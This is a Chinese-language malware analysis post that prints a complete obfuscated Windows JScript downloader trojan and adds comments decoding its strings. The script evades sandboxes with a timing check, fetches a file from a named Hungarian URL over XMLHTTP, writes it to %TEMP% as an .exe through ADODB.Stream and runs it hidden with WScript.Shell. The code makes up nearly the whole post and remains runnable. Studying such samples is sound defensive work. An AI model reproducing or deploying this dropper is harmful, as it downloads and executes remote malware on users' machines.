windows本地script脚本恶意代码分析（带注释）

//经过样本分析和抓取，该恶意程序是款下载者木马。

//不懂的可以百度百科。

http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK

var uKcZJmztw = "f";
var VLjBZijBRDIxir = "sd";
var mzHiDfbVgtzWL = "uhi";
var XrxesgIWQ = "ya";
var STgtocEaUgS = "f";
var Mccq = "gsd";
var YVFRNFKC = "a7o";
var zokYxgifSUOsDIn = "d8f";
var rysGOQRkJ = "hgs";
var fAJEpxv = "7";
var LzK = "u";
var WnKggbYjhbgaYK = "dfa";
var RQJm = "s";
var tcbpCSVm = "o";
var glYioNGTMO = "a";
var cMleB = "fkj";
var guMAPaymgfr = ";l";
var aWosZJAl = "d";
var rrruwakBVMdHT = "s";
var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//---------------------------------
var wxGM = "f";
var wME = "sd";
var WYl = "hi";
var DgXr = "yau";
var OFbjPAVgdUDSr = "sdf";
var AKaUjBxV = "g";
var YWyNEBKTCAr = "a7o";
var UmkNXPoXKvV = "8f";
var jrUTHQOJCXz = "d";
var VMrAuxWTPKwLZbj = "hgs";
var hnAKwB = "au7";
var kuRwVoQ = "f";
var OXjw = "d";
var wSaGYFaTjPu = "aos";
var UdT = "j";
var wGKytuRmi = "k";
var FwSAu = ";lf";
var uSsmxvh = "d";
var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf
////---------------------------------
var fvJysePITGsZ = "f";
var MJLm = "sd";
var OHdTWUSWyLDnD = "hi";
var NfkoHHanka = "au";
var pAJLp = "fy";
var xTeQe = "d";
var wolngRcKPNjI = "s";
var Ctd0 = "og";
var NGJpEc = "a7";
var johMrZhTBT = "f";
var rWRr = "d8";
var xhuyvlXNtG = "gs";
var AoFEsd = "7h";
var IarTKEg = "fau";
var UiCusNVVRYpV = "osd";
var SqXtHDCTAOoEfv = "ja";
var kSXJa = "k";
var AzMZQADlr = ";lf";
var OFZC = "sd";
var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf
//-----------------------------------
var wiM = "ose";
var cdzFN = "l";
var gtVOEyZRPMBkY = "c";//close();
//-----------------------------------
var FKqYCuGSVDKEk = "e";
var yLdfoNQSLG = "Fil";
var Kegv = "o";
var REweUeFfsfzCC = "veT";
var mCxYdwKmDTeZ = "Sa";//savetofile();
//-----------------------------------
var orFCagIxftilPY = "on";
var AnB = "iti";
var OeuDh = "pos";//position
//-----------------------------------
var bxwfUYaplk = "e";
var ZHBIenDJhvi = "t";
var OmwNrBIs = "wri";//write()
//-----------------------------------
var IonAXHdnbsJsHYL = "e";
var svvPS = "typ";//type
//-----------------------------------
var RxDykD = "n";
var ftsB = "ope";//open
//-----------------------------------
var zZoO = "am";
var TSCSrKWiKQY = "tre";
var AIfn = "B.S";
var zbAsfUmIk = "D";
var uWdDgxvOZcUG = "O";
var MUSaOvH = "D";
var YZVOwlzLPfausz = "A";//"adodb.stream"
//-----------------------------------
var pNGkr = "ct";
var iqPSquxJgp = "je";
var bTJnufjW = "b";
var lIexL = "teO";
var kZBJ = "rea";
var derqHNng = "C";//creatobject("adodb.stream") 

var LiTxpjAMHxAgUQ = "4h4";
var WWzPWldMX = "6n";
var CuF0 = "k6j";
var oUHbKSEqhF = "0";
var lQP = "hu/";
var RQUOidonsf = "l.";
var NjKvurbzu = "ta";
var CSyCCMfj = "por";
var XcTxpkvH = "egy";
var aUucLqfydBnSn = "j";
var lTXzk = "ev";
var mpAARoVfxvEsej = ".n";
var NVJeSNhziHjX = "www";
var JFDhyk = "://";
var CFpmRSiBsMp = "p";
var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4
//-----------------------------------
var uBtUfBIHbmz = "T";
var LwKK = "GE";// get
//-----------------------------------
var KRPXN = "pen";
var HrNtkpOuBMYa = "o";//open
//-----------------------------------
var OFdMpJOyw = "e";
var NlpqQU = "x";
var cZpOdxEyvqRfb = "7.e";
var cLfbaiuobq = "PO";
var XmXyEnhbtWhG = "M1";
var DQZEGAm = "ko";
var cKoUGmrGJtE = "SE";
var QasyJ = "Ky";//KySEKoM1PO7.exe
//-----------------------------------
var eQyCEVqQUazI = "%/";
var tNgKCALxxEpJMf = "P";
var mNYqbv = "M";
var FrwlCZOPjcmJvoE = "E";
var KyNfXZkSc = "%T";//%TEMP%/
//-----------------------------------
var AjbjrFWcHO = "gs";
var RyW = "in";
var LVlachWJa = "Str";
var NGjUy = "t";
var ZXMail = "n";
var XLaaPawDhGaz = "e";
var lRTf = "m";
var EGxwfaNKp = "ron";
var UCOpd = "vi";
var xZQvOWiNMG = "n";
var NLgbSPQIDLAIj = "ndE";
var Gyo = "xpa";
var gPYeoLnn = "E";//expendenvironmentstrings
//-----------------------------------

var kpsxpufDRzihIGv = "TP";
var vGOfgZZdOVh = "T";
var wJOAaSUgz = "LH";
var bPhWMdYs = "XM";
var AwpqZN = "2.";
var RNVidTrApbBfHO = "XML";
var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp
//-----------------------------------
var zkeMzwunlwoMdUD = "n";
var oVQABSTeJWqKG = "Ru";
var WkRVEzGFpaMCAC = "ell";
var AoJg = "h";
var HDveUfs = "S";
var PGItzPyn = ".";
var iTVqHxcrEbduDt = "t";
var wxGWFQyhW = "rip";
var KDSFP = "c";
var nzV = "WS";//wscript.shell.run()
//-----------------------------------
var NFFhujLOFwsUs = "ct";
var kvZBOvoVgLSEG = "je";
var DXP = "b";
var zjRmzjunjFUys = "O";
var EcDMPFvaxG = "e";
var stMA = "at";
var KnALPhmOVixZ = "Cre";//createobject()
//-----------------------------------

var aCTc = new Date();
var SZT0 = aCTc.getMilliseconds();
WScript.Sleep(10);

var aCTc = new Date();
var bRDtyPAQicD = aCTc.getMilliseconds();
WScript.Sleep(10);

var aCTc = new Date();
var VrU = aCTc.getMilliseconds();
WScript.Sleep(10);

var aCTc = new Date();
var DEyWdL = aCTc.getMilliseconds();

//
var NdNAj = bRDtyPAQicD - SZT0;
//var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds();
//
//    10s
var HRORMjJ = VrU - bRDtyPAQicD;

//    10s
var YSc0 = DEyWdL - VrU;

//    10s

WshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC);
//wshShell=wscript[createobject](wscript.shell.run);

function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);}

//function jmljvNFWjSplH(NLN)
//{
//    WshShell[run](NLN,0,0);
//}

function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;}

//function OcEOsFHpWS(n)
//{
//    return MSxml2.xmlhttp;
//}

if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw;

//fOikDMmzwkAuGlw=/%temp%/ path
//WshShell[expendedenvironmentstrings](%temp%);

EFASPqJ = OcEOsFHpWS(0);

//var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP");

wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ);
//
//xmlhttp object

//[HrNtkpOuBMYa + KRPXN]==open        

wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false);

//wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false);

//xmlhttp.open("get","url",false);

wMRqfsrlJdPwT.send();

while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)};

//readystate

elcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO);

//var adoStream=createobject("adodb.stream");

elcHu[HrNtkpOuBMYa + KRPXN]();

//adoStream.open();

elcHu[svvPS + IonAXHdnbsJsHYL] = 1;

//adoStream.type=1;

elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody);

//adoStream.write(wMRqfsrlJdPwT.ResponseBody);

elcHu[OeuDh + AnB + orFCagIxftilPY] = 0;

//adoStream.position=0;

elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 );

//adoStream.savetofile(/%temp%/,2);

elcHu[gtVOEyZRPMBkY + cdzFN + wiM]();

//adoStream.close();
//

jmljvNFWjSplH("/%temp%/");

//WshShell[run](NLN,0,0)

NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();;

//10s

HRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD;

//new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();

//10s

YSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU;

//10s

}